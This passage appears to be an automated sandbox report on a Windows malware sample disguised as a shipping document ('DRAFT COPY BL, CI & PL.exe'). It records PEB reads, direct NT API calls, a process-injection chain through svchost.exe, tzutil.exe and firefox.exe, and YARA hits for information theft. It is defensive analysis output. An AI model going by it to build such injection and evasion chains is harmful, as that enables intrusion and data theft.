                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28B50 mov eax, dword ptr fs:[00000030h]1_2_03C28B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDEB50 mov eax, dword ptr fs:[00000030h]1_2_03CDEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2CB7E mov eax, dword ptr fs:[00000030h]1_2_03C2CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04B00 mov eax, dword ptr fs:[00000030h]1_2_03D04B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]1_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5EB20 mov eax, dword ptr fs:[00000030h]1_2_03C5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5EB20 mov eax, dword ptr fs:[00000030h]1_2_03C5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF8B28 mov eax, dword ptr fs:[00000030h]1_2_03CF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF8B28 mov eax, dword ptr fs:[00000030h]1_2_03CF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C86ACC mov eax, dword ptr fs:[00000030h]1_2_03C86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C86ACC mov eax, dword ptr fs:[00000030h]1_2_03C86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C86ACC mov eax, dword ptr fs:[00000030h]1_2_03C86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30AD0 mov eax, dword ptr fs:[00000030h]1_2_03C30AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C64AD0 mov eax, dword ptr fs:[00000030h]1_2_03C64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C64AD0 mov eax, dword ptr fs:[00000030h]1_2_03C64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6AAEE mov eax, dword ptr fs:[00000030h]1_2_03C6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6AAEE mov eax, dword ptr fs:[00000030h]1_2_03C6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04A80 mov eax, dword ptr fs:[00000030h]1_2_03D04A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68A90 mov edx, dword ptr fs:[00000030h]1_2_03C68A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38AA0 mov eax, dword ptr fs:[00000030h]1_2_03C38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38AA0 mov eax, dword ptr fs:[00000030h]1_2_03C38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C86AA4 mov eax, dword ptr fs:[00000030h]1_2_03C86AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C40A5B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C40A5B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6CA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6CA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6CA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDEA60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CACA72 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CACA72 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CBCA11 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6CA24 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C5EA2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C54A35 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C54A35 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CC69C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C649D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFA9D3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CBE9E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C629F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C629F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C309AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C309AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB89B3 mov esi, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB89B3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB89B3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB0946 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D04940 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C56962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C56962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C56962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C7096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C7096E mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C7096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CD4978 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CD4978 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CBC97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CAE908 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CAE908 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CBC912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C28918 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C28918 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB892A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CC892B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C5E8C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D008C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFA8E4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C30887 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CBC89D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C42840 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C60854 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C34859 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C34859 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CBE872 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CBE872 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_009880A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_0095A124 SetUnhandledExceptionFilter
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_0095A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | NtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | NtCreateKey: Direct from: 0x76F02C6C
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | NtSetInformationThread: Direct from: 0x76F02B4C
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | NtOpenSection: Direct from: 0x76F02E0C
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | NtSetInformationThread: Direct from: 0x76EF63F9
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | NtCreateFile: Direct from: 0x76F02FEC
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | NtOpenFile: Direct from: 0x76F02DCC
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | NtTerminateThread: Direct from: 0x76F02FCC
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | NtProtectVirtualMemory: Direct from: 0x76EF7B2E
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | NtCreateMutant: Direct from: 0x76F035CC
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | NtResumeThread: Direct from: 0x76F036AC
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | NtReadFile: Direct from: 0x76F02ADC
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | NtDelayExecution: Direct from: 0x76F02DDC
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | NtResumeThread: Direct from: 0x76F02FBC
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | NtCreateUserProcess: Direct from: 0x76F0371C
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\tzutil.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: NULL target: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe protection: read write
                Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: NULL target: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\tzutil.exe | Thread register set: target process: 5924
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 30C3008
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_009887B1 LogonUserW
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_00933B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_009348D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_00994C27 mouse_event
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe"
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe | Process created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"
                Source: C:\Windows\SysWOW64\tzutil.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_00987CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_0098874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                Source: DRAFT COPY BL, CI & PL.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: DRAFT COPY BL, CI & PL.exe, oFlOzErifOVgUf.exe, 00000005.00000000.2145491716.00000000017B0000.00000002.00000001.00040000.00000000.sdmp, oFlOzErifOVgUf.exe, 00000005.00000002.3521137907.00000000017B1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: oFlOzErifOVgUf.exe, 00000005.00000000.2145491716.00000000017B0000.00000002.00000001.00040000.00000000.sdmp, oFlOzErifOVgUf.exe, 00000005.00000002.3521137907.00000000017B1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: oFlOzErifOVgUf.exe, 00000005.00000000.2145491716.00000000017B0000.00000002.00000001.00040000.00000000.sdmp, oFlOzErifOVgUf.exe, 00000005.00000002.3521137907.00000000017B1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: oFlOzErifOVgUf.exe, 00000005.00000000.2145491716.00000000017B0000.00000002.00000001.00040000.00000000.sdmp, oFlOzErifOVgUf.exe, 00000005.00000002.3521137907.00000000017B1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_0095862B cpuid
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_00964E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_00971E06 GetUserNameW
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_00963F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_009349A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

                Stealing of Sensitive Information

                Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000006.00000002.3520159967.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.3520891709.0000000001320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.3521394310.00000000042D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.2221510574.0000000003B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
